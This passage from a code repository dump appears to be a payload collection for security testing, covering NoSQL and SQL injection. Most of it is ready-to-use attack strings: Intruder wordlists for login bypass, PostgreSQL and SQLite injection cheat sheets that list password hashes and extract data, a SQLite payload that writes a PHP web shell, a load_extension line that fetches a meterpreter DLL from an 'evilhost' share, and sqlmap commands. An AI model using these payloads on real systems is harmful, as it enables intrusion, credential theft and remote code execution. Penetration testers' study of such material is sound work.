14 | _Extract length information_
15 | ```
16 | username[$ne]=toto&password[$regex]=.{1}
17 | username[$ne]=toto&password[$regex]=.{3}
18 | ```
19 | _Extract data information_
20 | ```
21 | in URL
22 | username[$ne]=toto&password[$regex]=m.{2}
23 | username[$ne]=toto&password[$regex]=md.{1}
24 | username[$ne]=toto&password[$regex]=mdp
25 | 
26 | username[$ne]=toto&password[$regex]=m.*
27 | username[$ne]=toto&password[$regex]=md.*
28 | 
29 | in JSON
30 | {"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
31 | {"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
32 | {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
33 | ```
34 | 
35 | # References:
36 | - https://www.owasp.org/index.php/Testing_for_NoSQL_injection
37 | -
38 |

--------------------------------------------------------------------------------
/SQLInjection/Intruders/Auth_Bypass.txt:
--------------------------------------------------------------------------------
 1 | '-'
 2 | ' '
 3 | '&'
 4 | '^'
 5 | '*'
 6 | ' or ''-'
 7 | ' or '' '
 8 | ' or ''&'
 9 | ' or ''^'
10 | ' or ''*'
11 | "-"
12 | " "
13 | "&"
14 | "^"
15 | "*"
16 | " or ""-"
17 | " or "" "
18 | " or ""&"
19 | " or ""^"
20 | " or ""*"
21 | or true--
22 | " or true--
23 | ' or true--
24 | ") or true--
25 | ') or true--
26 | ' or 'x'='x
27 | ') or ('x')=('x
28 | ')) or (('x'))=(('x
29 | " or "x"="x
30 | ") or ("x")=("x
31 | ")) or (("x"))=(("x
32 | or 1=1
33 | or 1=1--
34 | or 1=1#
35 | or 1=1/*
36 | admin' --
37 | admin' #
38 | admin'/*
39 | admin' or '1'='1
40 | admin' or '1'='1'--
41 | admin' or '1'='1'#
42 | admin' or '1'='1'/*
43 | admin'or 1=1 or ''='
44 | admin' or 1=1
45 | admin' or 1=1--
46 | admin' or 1=1#
47 | admin' or 1=1/*
48 | admin') or ('1'='1
49 | admin') or ('1'='1'--
50 | admin') or ('1'='1'#
51 | admin') or ('1'='1'/*
52 | admin') or '1'='1
53 | admin') or '1'='1'--
54 | admin') or '1'='1'#
55 | admin') or '1'='1'/*
56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
57 | admin" --
58 | admin" #
59 | admin"/*
60 | admin" or "1"="1
61 | admin" or "1"="1"--
62 | admin" or "1"="1"#
63 | admin" or "1"="1"/*
64 | admin"or 1=1 or ""="
65 | admin" or 1=1
66 | admin" or 1=1--
67 | admin" or 1=1#
68 | admin" or 1=1/*
69 | admin") or ("1"="1
70 | admin") or ("1"="1"--
71 | admin") or ("1"="1"#
72 | admin") or ("1"="1"/*
73 | admin") or "1"="1
74 | admin") or "1"="1"--
75 | admin") or "1"="1"#
76 | admin") or "1"="1"/*
77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
78 |

--------------------------------------------------------------------------------
/SQLInjection/Intruders/ByPass_Auth_lv2.txt:
--------------------------------------------------------------------------------
  1 | ==
  2 | =
  3 | '
  4 | ' --
  5 | ' #
  6 | ' –
  7 | '--
  8 | '/*
  9 | '#
 10 | " --
 11 | " #
 12 | "/*
 13 | ' and 1='1
 14 | ' and a='a
 15 |  or 1=1
 16 |  or true
 17 | ' or ''='
 18 | " or ""="
 19 | 1′) and '1′='1–
 20 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
 21 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
 22 |  and 1=1
 23 |  and 1=1–
 24 | ' and 'one'='one
 25 | ' and 'one'='one–
 26 | ' group by password having 1=1--
 27 | ' group by userid having 1=1--
 28 | ' group by username having 1=1--
 29 |  like '%'
 30 |  or 0=0 --
 31 |  or 0=0 #
 32 |  or 0=0 –
 33 | ' or         0=0 #
 34 | ' or 0=0 --
 35 | ' or 0=0 #
 36 | ' or 0=0 –
 37 | " or 0=0 --
 38 | " or 0=0 #
 39 | " or 0=0 –
 40 | %' or '0'='0
 41 |  or 1=1
 42 |  or 1=1--
 43 |  or 1=1/*
 44 |  or 1=1#
 45 |  or 1=1–
 46 | ' or 1=1--
 47 | ' or '1'='1
 48 | ' or '1'='1'--
 49 | ' or '1'='1'/*
 50 | ' or '1'='1'#
 51 | ' or '1′='1
 52 | ' or 1=1
 53 | ' or 1=1 --
 54 | ' or 1=1 –
 55 | ' or 1=1--
 56 | ' or 1=1;#
 57 | ' or 1=1/*
 58 | ' or 1=1#
 59 | ' or 1=1–
 60 | ') or '1'='1
 61 | ') or '1'='1--
 62 | ') or '1'='1'--
 63 | ') or '1'='1'/*
 64 | ') or '1'='1'#
 65 | ') or ('1'='1
 66 | ') or ('1'='1--
 67 | ') or ('1'='1'--
 68 | ') or ('1'='1'/*
 69 | ') or ('1'='1'#
 70 | 'or'1=1
 71 | 'or'1=1′
 72 | " or "1"="1
 73 | " or "1"="1"--
 74 | " or "1"="1"/*
 75 | " or "1"="1"#
 76 | " or 1=1
 77 | " or 1=1 --
 78 | " or 1=1 –
 79 | " or 1=1--
 80 | " or 1=1/*
 81 | " or 1=1#
 82 | " or 1=1–
 83 | ") or "1"="1
 84 | ") or "1"="1"--
 85 | ") or "1"="1"/*
 86 | ") or "1"="1"#
 87 | ") or ("1"="1
 88 | ") or ("1"="1"--
 89 | ") or ("1"="1"/*
 90 | ") or ("1"="1"#
 91 | ) or '1′='1–
 92 | ) or ('1′='1–
 93 | ' or 1=1 LIMIT 1;#
 94 | 'or 1=1 or ''='
 95 | "or 1=1 or ""="
 96 | ' or 'a'='a
 97 | ' or a=a--
 98 | ' or a=a–
 99 | ') or ('a'='a
100 | " or "a"="a
101 | ") or ("a"="a
102 | ') or ('a'='a and hi") or ("a"="a
103 | ' or 'one'='one
104 | ' or 'one'='one–
105 | ' or uid like '%
106 | ' or uname like '%
107 | ' or userid like '%
108 | ' or user like '%
109 | ' or username like '%
110 | ' or 'x'='x
111 | ') or ('x'='x
112 | " or "x"="x
113 | ' OR 'x'='x'#;
114 | '=' 'or' and '=' 'or'
115 | ' UNION ALL SELECT 1, @@version;#
116 | ' UNION ALL SELECT system_user(),user();#
117 | ' UNION select table_schema,table_name FROM information_Schema.tables;#
118 | admin' and substring(password/text(),1,1)='7
119 | ' and substring(password/text(),1,1)='7
120 |

--------------------------------------------------------------------------------
/SQLInjection/PostgresSQL.md:
--------------------------------------------------------------------------------
  1 | # PostgresSQL
  2 | 
  3 | ## PostgreSQL Comments
  4 | ```
  5 | --
  6 | /**/ 
  7 | --------------------------------------------------
  8 | SELECT 1; –comment
  9 | SELECT /*comment*/1;
 10 | ```
 11 | 
 12 | ## PostgreSQL Error Based - Basic
 13 | ```
 14 | ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
 15 | ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
 16 | ,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
 17 | ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
 18 | ```
 19 | ## PostgreSQL Time Based
 20 | 
 21 | 
 22 | # ----------------------------------------------------------
 23 | 
 24 | ### Version	
 25 | ``` 
 26 | SELECT version()
 27 | ```
 28 | ### Comments	
 29 | ```
 30 | SELECT 1; –comment
 31 | SELECT /*comment*/1;
 32 | ```
 33 | ### Current User	
 34 | ```
 35 | SELECT user;
 36 | SELECT current_user;
 37 | SELECT session_user;
 38 | SELECT usename FROM pg_user;
 39 | SELECT getpgusername();
 40 | ```
 41 | ### List Users	
 42 | ```
 43 | SELECT usename FROM pg_user
 44 | ```
 45 | ### List Password Hashes
 46 | ```
 47 | SELECT usename, passwd FROM pg_shadow — priv
 48 | ```
 49 | ### Password Cracker	
 50 | ```
 51 | MDCrack can crack PostgreSQL’s MD5-based passwords.
 52 | ```
 53 | ### List Privileges	
 54 | ```
 55 | SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
 56 | ```
 57 | ### List DBA Accounts
 58 | ```
 59 | SELECT usename FROM pg_user WHERE usesuper IS TRUE
 60 | ```
 61 | ### Current Database	
 62 | ```
 63 | SELECT current_database()
 64 | ```
 65 | ### List Databases	
 66 | ```
 67 | SELECT datname FROM pg_database
 68 | ```
 69 | ### List Columns	
 70 | ```
 71 | SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’)
 72 | ```
 73 | ### List Tables	
 74 | ```
 75 | SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)
 76 | Find Tables From Column Name	If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;
 77 | ```
 78 | List Tables	
 79 | ```
 80 | SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)
 81 | ```
 82 | ### Find Tables From Column Name	
 83 | ```
 84 | If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;
 85 | ```
 86 | ### Select Nth Row	
 87 | ```
 88 | SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0
 89 | SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
 90 | ```
 91 | ### Select Nth Char	
 92 | ```
 93 | SELECT substr(‘abcd’, 3, 1); — returns c
 94 | ```
 95 | ### Bitwise AND	
 96 | ```
 97 | SELECT 6 & 2; — returns 2
 98 | SELECT 6 & 1; –returns 0
 99 | ```
100 | ### ASCII Value -> Char	
101 | ```
102 | SELECT chr(65);
103 | ```
104 | ### Char -> ASCII Value	
105 | ```
106 | SELECT ascii(‘A’);
107 | ```
108 | ### Casting	
109 | ```
110 | SELECT CAST(1 as varchar);
111 | SELECT CAST(’1′ as int);
112 | ```
113 | ### String Concatenation	
114 | ```
115 | SELECT ‘A’ || ‘B’; — returnsAB
116 | ```
117 | ### If Statement	
118 | ```
119 | IF statements only seem valid inside functions, so aren’t much use for SQL injection.  See CASE statement instead.
120 | ```
121 | ### Case Statement	
122 | ``` 
123 | SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
124 | ```
125 | ### Avoiding Quotes	
126 | ```
127 | SELECT CHR(65)||CHR(66); — returns AB
128 | ```
129 | ## References:
130 | http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
131 |

--------------------------------------------------------------------------------
/SQLInjection/SQLInjection.md:
--------------------------------------------------------------------------------
 1 | # SQL Injection
 2 | 
 3 | A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
 4 | 
 5 | ## _Authentication Bypass_
 6 | 
 7 | ```
 8 | '-'
 9 | ' '
10 | '&'
11 | '^'
12 | '*'
13 | ' or 1=1 limit 1 -- -+
14 | '="or'
15 | ' or ''-'
16 | ' or '' '
17 | ' or ''&'
18 | ' or ''^'
19 | ' or ''*'
20 | "-"
21 | " "
22 | "&"
23 | "^"
24 | "*"
25 | " or ""-"
26 | " or "" "
27 | " or ""&"
28 | " or ""^"
29 | " or ""*"
30 | or true--
31 | 
32 | // Using for: https://demo.testfire.net/bank/main.jsp
33 | 
34 | admin' and (select count(*) from accounts)>=5--
35 | admin' and (select count(*) from accounts)=5--
36 | 
37 | ```
38 | 
39 | ## _SQL Injection using SQLMap_
40 | [SQL link](https://github.com/josdoaitran/PayloadForSecurityTesting/blob/master/SQLMap.md)
41 | 
42 | ## _DBMS Identification_
43 | 
44 | ## _Entry point detection_
45 | 
46 | 
47 | # Thanks to and Reference:
48 | 
49 | - https://github.com/payloadbox/sql-injection-payload-list
50 | - https://hbh.sh/forum/15/17543/help-on-pen-test-assignment-altoro-mutual-site
51 | 
52 |

--------------------------------------------------------------------------------
/SQLInjection/SQLiteInjection.md:
--------------------------------------------------------------------------------
 1 | # SQLite Injection
 2 | ## SQLite comments
 3 | ```--
 4 | /**/
 5 | ```
 6 | ## SQLite version
 7 | ``` select sqlite_version(); ```
 8 | ### Integer/String based - Extract table name
 9 | SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
10 | Use limit X+1 offset X, to extract all tables.
11 | 
12 | Integer/String based - Extract column name
13 | SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
14 | For a clean output
15 | 
16 | SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
17 | Boolean - Count number of tables
18 | and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
19 | Boolean - Enumerating table name
20 | and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
21 | Boolean - Extract info
22 | and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
23 | Time based
24 | AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
25 | Remote Command Execution using SQLite command - Attach Database
26 | ATTACH DATABASE '/var/www/lol.php' AS lol;
27 | CREATE TABLE lol.pwn (dataz text);
28 | INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
29 | Remote Command Execution using SQLite command - Load_extension
30 | UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
31 | Note: By default this component is disabled
32 | 
33 | Thanks to
34 | Injecting SQLite database based application - Manish Kishan Tanwar

--------------------------------------------------------------------------------
/SQLMap.md:
--------------------------------------------------------------------------------
 1 | # SQL Map 
 2 | 
 3 | Url: http://sqlmap.org/
 4 | 
 5 | *Install and Download*
 6 | 
 7 | You can download the latest zipball or tarball.
 8 | Preferably, you can download sqlmap by cloning the Git repository:
 9 | ```
10 | git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
11 | ```
12 | 
13 | ## Basic Command
14 | 
15 | To get a list of basic options and switches use:
16 | ```
17 | python sqlmap.py -h
18 | ```
19 | To get a list of all options and switches use:
20 | ```
21 | python sqlmap.py -hh
22 | ```
23 | 
24 | ### Use SQL for SQL Injection
25 | 
26 | Extract the database:
27 | 
28 | Attack the given URL (-u “http://192.168.1.250/?p=1&forumaction=search”) and extract the database names (–dbs):
29 | ```
30 | root@kali:~# sqlmap -u "http://192.168.1.250/?p=1&forumaction=search" --dbs
31 | 
32 |     sqlmap/1.0-dev - automatic SQL injection and database takeover tool
33 |     http://sqlmap.org
34 | ```
35 | Extract the tables:
36 | 
37 | 
38 |

--------------------------------------------------------------------------------
/VulnerabilitiesScanners.md:
--------------------------------------------------------------------------------
 1 | # VulnerabilitiesScanners
 2 | 
 3 | Tools:
 4 | 
 5 | * ZAP OWASP (Free)
 6 | 
 7 | * BurpSuite Professional (Commercial)
 8 | 
 9 | * Acunetix
10 | 
11 |

--------------------------------------------------------------------------------
/icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/josdoaitran/payload-for-security-testing/d6c38ee272f97fe234ccb2f287310d42d3d1a6b1/icon.png

--------------------------------------------------------------------------------
/sql injection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/josdoaitran/payload-for-security-testing/d6c38ee272f97fe234ccb2f287310d42d3d1a6b1/sql injection.png

--------------------------------------------------------------------------------